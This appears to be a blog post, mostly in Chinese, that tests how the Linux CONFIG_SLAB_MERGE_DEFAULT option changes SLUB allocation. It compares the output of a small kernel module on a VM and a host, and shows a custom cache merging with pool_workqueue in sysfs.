<h2 id="Part-2"><a href="#Part-2" class="headerlink" title="Part.2"></a>Part.2</h2><p>测试 <code>CONFIG_SLAB_MERGE_DEFAULT</code> 的影响</p>
<p>Host machine (option enabled):</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─[$] uname -r</span><br><span class="line"><span class="number">5.15</span><span class="number">.0</span><span class="number">-52</span>-generic</span><br><span class="line"></span><br><span class="line">└─[$] cat /boot/<span class="built_in">config</span>-$(uname -r) |grep CONFIG_SLAB_MERGE_DEFAULT </span><br><span class="line">CONFIG_SLAB_MERGE_DEFAULT=y</span><br></pre></td></tr></table></figure>
<p>VM (option not enabled):</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ uname -r</span><br><span class="line"><span class="number">5.10</span><span class="number">.90</span></span><br><span class="line"></span><br><span class="line">└─[$] cat .<span class="built_in">config</span>|grep CONFIG_SLAB_MERGE_DEFAULT </span><br><span class="line"># CONFIG_SLAB_MERGE_DEFAULT is <span class="keyword">not</span> <span class="built_in">set</span></span><br></pre></td></tr></table></figure>
<ul>
<li><p>code</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/module.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/kernel.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/init.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/mm.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/slab.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/slub_def.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/sched.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OBJ_SIZE 256</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OBJ_NUM ((PAGE_SIZE/OBJ_SIZE) * 3)</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> {</span></span><br><span class="line"> <span class="keyword">char</span> data[OBJ_SIZE];</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="class"><span 
class="keyword">struct</span> <span class="title">kmem_cache</span> *<span class="title">my_cachep</span>;</span></span><br><span class="line"><span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> *<span class="title">ms</span>[<span class="title">OBJ_NUM</span>];</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> __init <span class="title">km_init</span><span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line"> <span class="keyword">int</span> i, cpu;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">kmem_cache_cpu</span> *<span class="title">c</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">pg</span>;</span></span><br><span class="line"></span><br><span class="line"> pr_info(<span class="string">"Hello\n"</span>);</span><br><span class="line"></span><br><span class="line"> my_cachep = kmem_cache_create(<span class="string">"my_struct"</span>,</span><br><span class="line"> <span class="keyword">sizeof</span>(struct my_struct), <span class="number">0</span>,</span><br><span class="line"> SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT,</span><br><span class="line"> <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"> pr_info(<span class="string">"my_cachep: %px, %s\n"</span>, my_cachep, my_cachep->name);</span><br><span class="line"> pr_info(<span class="string">"my_cachep.size: %u\n"</span>, my_cachep-><span class="built_in">size</span>);</span><br><span class="line"> pr_info(<span class="string">"my_cachep.object_size: %u\n"</span>, kmem_cache_size(my_cachep));</span><br><span class="line"></span><br><span class="line"> cpu = 
get_cpu();</span><br><span class="line"> pr_info(<span class="string">"cpu: %d\n"</span>, cpu);</span><br><span class="line"></span><br><span class="line"> c = per_cpu_ptr(my_cachep->cpu_slab, cpu);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i<OBJ_NUM; i++){</span><br><span class="line"> ms[i] = kmem_cache_alloc(my_cachep, GFP_ATOMIC); <span class="comment">/* must not sleep: get_cpu() disabled preemption */</span></span><br><span class="line"> pg = virt_to_page(ms[i]);</span><br><span class="line"> pr_info(<span class="string">"[%02d] object: %px, page: %px(%px), %d\n"</span>, i, ms[i],</span><br><span class="line"> pg, page_address(pg),</span><br><span class="line"> (<span class="keyword">void</span> *)pg == (<span class="keyword">void</span> *)c->page);</span><br><span class="line"> }</span><br><span class="line"> put_cpu(); <span class="comment">/* pairs with get_cpu() above */</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> __exit <span class="title">km_exit</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>( i = <span class="number">0</span>; i<OBJ_NUM; i++){</span><br><span class="line"> kmem_cache_free(my_cachep, ms[i]);</span><br><span class="line"> }</span><br><span class="line"> kmem_cache_destroy(my_cachep);</span><br><span class="line"> pr_info(<span class="string">"Bye\n"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span 
class="line">module_init(km_init);</span><br><span class="line">module_exit(km_exit);</span><br><span class="line"></span><br><span 
class="line">MODULE_LICENSE(<span class="string">"GPL"</span>);</span><br><span class="line">MODULE_AUTHOR(<span class="string">"X++D"</span>);</span><br><span class="line">MODULE_DESCRIPTION(<span class="string">"Kernel xxx Module."</span>);</span><br><span class="line">MODULE_VERSION(<span class="string">"0.1"</span>);</span><br></pre></td></tr></table></figure>
</li>
<li><p>VM result</p>
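<p> Object addresses map onto pages very regularly: each 4 KiB page holds 16 consecutive 256-byte objects, and the last column is 1 for every object, meaning each one comes from the current CPU's active slab page (<code>c-&gt;page</code>).</p>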
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ insmod slab-tc.ko</span><br><span class="line">[ <span class="number">1184.983757</span>] Hello</span><br><span class="line">[ <span 
class="number">1184.984278</span>] my_cachep: ffff8880096ea000, my_struct</span><br><span class="line">[ <span class="number">1184.985568</span>] my_cachep.<span class="built_in">size</span>: <span class="number">256</span></span><br><span class="line">[ <span class="number">1184.986451</span>] my_cachep.object_size: <span class="number">256</span></span><br><span class="line">[ <span class="number">1184.987488</span>] cpu: <span class="number">0</span></span><br><span class="line">**[ <span class="number">1184.988945</span>] [<span class="number">00</span>] object: ffff888005c38000, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span>**</span><br><span class="line">[ <span class="number">1184.991189</span>] [<span class="number">01</span>] object: ffff888005c38100, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1184.993438</span>] [<span class="number">02</span>] object: ffff888005c38200, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1184.995688</span>] [<span class="number">03</span>] object: ffff888005c38300, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1184.998018</span>] [<span class="number">04</span>] object: ffff888005c38400, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.000234</span>] [<span class="number">05</span>] object: ffff888005c38500, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.002529</span>] [<span class="number">06</span>] object: ffff888005c38600, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.004702</span>] [<span class="number">07</span>] object: 
ffff888005c38700, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.006841</span>] [<span class="number">08</span>] object: ffff888005c38800, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.008919</span>] [<span class="number">09</span>] object: ffff888005c38900, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.010944</span>] [<span class="number">10</span>] object: ffff888005c38a00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.013021</span>] [<span class="number">11</span>] object: ffff888005c38b00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.014904</span>] [<span class="number">12</span>] object: ffff888005c38c00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.016926</span>] [<span class="number">13</span>] object: ffff888005c38d00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.018883</span>] [<span class="number">14</span>] object: ffff888005c38e00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.020761</span>] [<span class="number">15</span>] object: ffff888005c38f00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.022735</span>] [<span class="number">16</span>] object: ffff88800953d000, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.024679</span>] 
[<span class="number">17</span>] object: ffff88800953d100, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.026579</span>] [<span class="number">18</span>] object: ffff88800953d200, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.028528</span>] [<span class="number">19</span>] object: ffff88800953d300, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.030443</span>] [<span class="number">20</span>] object: ffff88800953d400, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.032372</span>] [<span class="number">21</span>] object: ffff88800953d500, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.034263</span>] [<span class="number">22</span>] object: ffff88800953d600, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.036116</span>] [<span class="number">23</span>] object: ffff88800953d700, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.038086</span>] [<span class="number">24</span>] object: ffff88800953d800, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.039929</span>] [<span class="number">25</span>] object: ffff88800953d900, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.041944</span>] [<span class="number">26</span>] object: ffff88800953da00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span 
class="number">1185.043852</span>] [<span class="number">27</span>] object: ffff88800953db00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.045736</span>] [<span class="number">28</span>] object: ffff88800953dc00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.047678</span>] [<span class="number">29</span>] object: ffff88800953dd00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.049585</span>] [<span class="number">30</span>] object: ffff88800953de00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">**[ <span class="number">1185.051391</span>] [<span class="number">31</span>] object: ffff88800953df00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span>**</span><br><span class="line">**[ <span class="number">1185.053206</span>] [<span class="number">32</span>] object: ffff888009543000, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span>**</span><br><span class="line">[ <span class="number">1185.055038</span>] [<span class="number">33</span>] object: ffff888009543100, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.056666</span>] [<span class="number">34</span>] object: ffff888009543200, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.058430</span>] [<span class="number">35</span>] object: ffff888009543300, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.060174</span>] [<span class="number">36</span>] object: ffff888009543400, page: ffffea00002550c0(ffff888009543000), <span 
class="number">1</span></span><br><span class="line">[ <span class="number">1185.061955</span>] [<span class="number">37</span>] object: ffff888009543500, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.063694</span>] [<span class="number">38</span>] object: ffff888009543600, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.065468</span>] [<span class="number">39</span>] object: ffff888009543700, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.067231</span>] [<span class="number">40</span>] object: ffff888009543800, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.068930</span>] [<span class="number">41</span>] object: ffff888009543900, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.070600</span>] [<span class="number">42</span>] object: ffff888009543a00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.072224</span>] [<span class="number">43</span>] object: ffff888009543b00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.073911</span>] [<span class="number">44</span>] object: ffff888009543c00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.075534</span>] [<span class="number">45</span>] object: ffff888009543d00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.077211</span>] [<span class="number">46</span>] object: ffff888009543e00, page: 
ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line"><strong>[ <span class="number">1185.078887</span>] [<span class="number">47</span>] object: ffff888009543f00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></strong></span><br></pre></td></tr></table></figure>
<p>Each cache also has its own sysfs directory:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ file /sys/kernel/slab/my_struct</span><br><span class="line">/sys/kernel/slab/my_struct: directory</span><br><span class="line"></span><br><span class="line">➜ ~ file /sys/kernel/slab/pool_workqueue</span><br><span class="line">/sys/kernel/slab/pool_workqueue: directory</span><br></pre></td></tr></table></figure>
</li>
<li><p>Host result</p>
<p>The allocated objects jump back and forth between pages in no particular order, and the <code>name</code> of <code>my_cachep</code> has changed to <code>pool_workqueue</code>:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">435532.063645</span>] Hello</span><br><span class="line">[<span class="number">435532.063655</span>] my_cachep: ffff8faf40045900, 
pool_workqueue</span><br><span class="line">[<span class="number">435532.063658</span>] my_cachep.<span class="built_in">size</span>: <span class="number">256</span></span><br><span class="line">[<span class="number">435532.063659</span>] my_cachep.object_size: <span class="number">256</span></span><br><span class="line">[<span class="number">435532.063660</span>] cpu: <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063662</span>] [<span class="number">00</span>] object: ffff8fafb100b400, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063664</span>] [<span class="number">01</span>] object: ffff8fafb100a700, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063666</span>] [<span class="number">02</span>] object: ffff8fafb100ae00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063668</span>] [<span class="number">03</span>] object: ffff8fafb100b900, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063670</span>] [<span class="number">04</span>] object: ffff8fafb100be00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063672</span>] [<span class="number">05</span>] object: ffff8fafb100bf00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063674</span>] [<span class="number">06</span>] object: ffff8fafb100af00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063676</span>] [<span class="number">07</span>] object: ffff8fafb100ad00, page: 
ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063677</span>] [<span class="number">08</span>] object: ffff8fafb100bc00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063679</span>] [<span class="number">09</span>] object: ffff8fafb100a600, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063681</span>] [<span class="number">10</span>] object: ffff8fafb100a800, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063683</span>] [<span class="number">11</span>] object: ffff8fafb100a000, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063685</span>] [<span class="number">12</span>] object: ffff8fafb100ab00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063687</span>] [<span class="number">13</span>] object: ffff8fafb100b300, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063689</span>] [<span class="number">14</span>] object: ffff8fafb100a900, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063690</span>] [<span class="number">15</span>] object: ffff8fafb100b000, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063692</span>] [<span class="number">16</span>] object: ffff8fafb100a100, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063694</span>] [<span 
class="number">17</span>] object: ffff8fafb100b100, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063696</span>] [<span class="number">18</span>] object: ffff8fafb100b500, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063698</span>] [<span class="number">19</span>] object: ffff8fafb100bd00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063700</span>] [<span class="number">20</span>] object: ffff8fafb100ba00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063702</span>] [<span class="number">21</span>] object: ffff8fafb100b700, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063703</span>] [<span class="number">22</span>] object: ffff8fafb100a200, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063705</span>] [<span class="number">23</span>] object: ffff8fafb100b200, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063707</span>] [<span class="number">24</span>] object: ffff8fafb100bb00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063709</span>] [<span class="number">25</span>] object: ffff8fafb100aa00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063711</span>] [<span class="number">26</span>] object: ffff8fafb100a500, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span 
class="number">435532.063713</span>] [<span class="number">27</span>] object: ffff8fafb100b600, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063714</span>] [<span class="number">28</span>] object: ffff8fafb100b800, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063716</span>] [<span class="number">29</span>] object: ffff8fafb100a400, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063718</span>] [<span class="number">30</span>] object: ffff8fafb100ac00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063720</span>] [<span class="number">31</span>] object: ffff8fafb100a300, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063724</span>] [<span class="number">32</span>] object: ffff8faf488fec00, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063726</span>] [<span class="number">33</span>] object: ffff8faf488fe400, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063728</span>] [<span class="number">34</span>] object: ffff8faf488ff800, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063730</span>] [<span class="number">35</span>] object: ffff8faf488ff600, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063732</span>] [<span class="number">36</span>] object: ffff8faf488fe500, page: ffffd50544223f80(ffff8faf488fe000), <span 
class="number">1</span></span><br><span class="line">[<span class="number">435532.063734</span>] [<span class="number">37</span>] object: ffff8faf488fea00, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063736</span>] [<span class="number">38</span>] object: ffff8faf488ffb00, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063737</span>] [<span class="number">39</span>] object: ffff8faf488ff200, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063739</span>] [<span class="number">40</span>] object: ffff8faf488fe200, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063741</span>] [<span class="number">41</span>] object: ffff8faf488ff700, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063743</span>] [<span class="number">42</span>] object: ffff8faf488ffa00, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063745</span>] [<span class="number">43</span>] object: ffff8faf488ff400, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063747</span>] [<span class="number">44</span>] object: ffff8faf488fe700, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063749</span>] [<span class="number">45</span>] object: ffff8faf488fee00, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063750</span>] [<span class="number">46</span>] object: ffff8faf488ff900, page: 
ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063752</span>] [<span class="number">47</span>] object: ffff8faf488ffe00, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.065672</span>] Bye</span><br></pre></td></tr></table></figure>
<p>The sysfs entry is shared with <code>pool_workqueue</code> as well: both names are symbolic links to the same <code>:0000256</code> directory.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─[$] file /sys/kernel/slab/my_struct </span><br><span class="line">/sys/kernel/slab/my_struct: symbolic link to :<span class="number">0000256</span></span><br><span class="line"></span><br><span class="line">└─[$] file /sys/kernel/slab/pool_workqueue </span><br><span class="line">/sys/kernel/slab/pool_workqueue: symbolic link to :<span class="number">0000256</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
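<p>The guest/host difference above can also be checked from user space by resolving both names under <code>/sys/kernel/slab</code> and comparing the results. This is a minimal sketch that assumes only the sysfs layout shown in the two outputs (separate directories when not merged, symlinks to one shared <code>:0000256</code>-style directory when merged); <code>same_slab_cache()</code> is a hypothetical helper, not a kernel or libc API.</p>

```c
#define _XOPEN_SOURCE 700 /* expose realpath() and PATH_MAX */
#include <assert.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>

/*
 * Hypothetical helper: resolve two /sys/kernel/slab entries and report
 * whether they end up in the same directory.
 *   1  -> same directory (both names share one merged kmem_cache)
 *   0  -> different directories (the caches are separate)
 *  -1  -> either path could not be resolved
 */
static int same_slab_cache(const char *a, const char *b)
{
    char ra[PATH_MAX];
    char rb[PATH_MAX];

    assert(a != NULL && b != NULL);
    if (realpath(a, ra) == NULL || realpath(b, rb) == NULL)
        return -1;
    return strcmp(ra, rb) == 0;
}
```

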